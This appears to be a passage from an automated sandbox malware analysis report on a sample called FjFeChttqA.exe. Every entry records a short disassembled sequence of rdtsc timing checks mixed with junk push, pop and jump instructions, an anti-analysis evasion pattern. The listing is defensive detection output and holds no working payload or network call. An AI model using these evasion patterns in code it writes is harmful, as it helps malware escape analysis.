                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FDEB7 second address: 11FDEBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FDEBB second address: 11FDEE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C000h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F5D68C8BFFAh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FDEE3 second address: 11FDEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1200B2A second address: 1200B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1200B2E second address: 1200B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1200B32 second address: 1200B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D68C8C003h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1200B4B second address: 1200B50 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1200B50 second address: 1200B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jg 00007F5D68C8C00Eh 0x0000000b jmp 00007F5D68C8C002h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1200CDF second address: 1200CFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EF8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1200CFB second address: 1200D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1200D01 second address: 1200D08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1200D08 second address: 1200D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5D68C8BFF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push esi 0x0000000e jmp 00007F5D68C8BFFEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1200E5F second address: 1200E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ecx 0x00000009 jl 00007F5D692C6EFBh 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F5D692C6EF3h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1200E89 second address: 1200E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F5D68C8BFF6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1200E98 second address: 1200E9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1200E9E second address: 1200EAB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F5D68C8BFF6h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1201155 second address: 120115B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 120AAF9 second address: 120AB12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C005h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 120AB12 second address: 120AB32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F5D692C6EE6h 0x00000009 jmp 00007F5D692C6EF5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1208E03 second address: 1208E21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C004h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F5D68C8BFF6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1208E21 second address: 1208E25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1209114 second address: 120911A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1209F6A second address: 1209F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1209F70 second address: 1209F92 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5D68C8C002h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 120A529 second address: 120A52F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 120A52F second address: 120A563 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5D68C8C00Bh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F5D68C8BFF6h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F5D68C8BFF6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 120A563 second address: 120A585 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 120E527 second address: 120E544 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5D68C8BFFEh 0x00000008 jns 00007F5D68C8BFF6h 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 120E683 second address: 120E68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1219B32 second address: 1219B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edi 0x0000000c jmp 00007F5D68C8C003h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5D68C8C000h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1219B68 second address: 1219B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1219F5D second address: 1219F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1219F61 second address: 1219F65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 121A447 second address: 121A44B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 121AEC1 second address: 121AEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5D692C6EF5h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5D692C6EF1h 0x00000013 jne 00007F5D692C6EE6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 121AEF6 second address: 121AEFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 121959C second address: 12195A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 122355F second address: 1223591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C008h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5D68C8C006h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1223591 second address: 122359B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5D692C6EE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 122329F second address: 12232A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12232A3 second address: 12232D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EEBh 0x00000007 jmp 00007F5D692C6EEFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5D692C6EF6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1230EEB second address: 1230EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D68C8BFFEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1230EFF second address: 1230F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1230F03 second address: 1230F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1230F07 second address: 1230F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1230F0D second address: 1230F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F5D68C8BFFCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1231083 second address: 1231093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5D692C6EE6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1231093 second address: 12310A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F5D68C8BFF6h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 123379C second address: 12337A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12337A0 second address: 12337A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12382A5 second address: 12382B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12382B1 second address: 12382BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5D68C8BFF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12382BC second address: 12382C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007F5D692C6EE6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12382C8 second address: 123830D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5D68C8C008h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F5D68C8C00Ah 0x00000011 jmp 00007F5D68C8C002h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jo 00007F5D68C8C008h 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 123830D second address: 1238313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1238462 second address: 12384A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C001h 0x00000007 js 00007F5D68C8BFF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5D68C8C006h 0x00000016 jmp 00007F5D68C8C001h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12384A6 second address: 12384E3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5D692C6EE6h 0x00000008 ja 00007F5D692C6EE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007F5D692C6EEEh 0x00000016 jmp 00007F5D692C6EF9h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12384E3 second address: 12384E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12384E9 second address: 12384ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124722E second address: 1247232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1247232 second address: 1247236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1247236 second address: 124723C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124712A second address: 124712F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124712F second address: 1247139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FA78 second address: 124FA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FA7C second address: 124FA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FA80 second address: 124FA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5D692C6EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FA94 second address: 124FA98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FBE1 second address: 124FBE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FBE5 second address: 124FBEB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FD37 second address: 124FD41 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5D692C6EE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FD41 second address: 124FD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FD47 second address: 124FD4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FD4E second address: 124FD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F5D68C8C000h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F5D68C8BFFEh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FD7B second address: 124FD81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FD81 second address: 124FD9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F5D68C8BFFCh 0x0000000c jo 00007F5D68C8BFF6h 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FD9B second address: 124FDA0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1254BF3 second address: 1254BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F5D68C8BFF6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1254BFF second address: 1254C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1254C03 second address: 1254C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1254C09 second address: 1254C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007F5D692C6EFEh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1254C19 second address: 1254C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1254D97 second address: 1254D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1254D9D second address: 1254DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1262414 second address: 1262420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F5D692C6EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 125FA4B second address: 125FA7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C008h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F5D68C8BFFEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F5D68C8BFF6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 125FA7D second address: 125FA92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F5D692C6EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jg 00007F5D692C6EE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1168D92 second address: 1168D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1168D96 second address: 1168D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12720E9 second address: 12720F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12750AB second address: 12750AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1274BDE second address: 1274BFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5D68C8C005h 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1274D80 second address: 1274DA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5D692C6EF3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F5D692C6EE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1274DA2 second address: 1274DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D68C8BFFBh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1274DB7 second address: 1274DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1274DBD second address: 1274DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
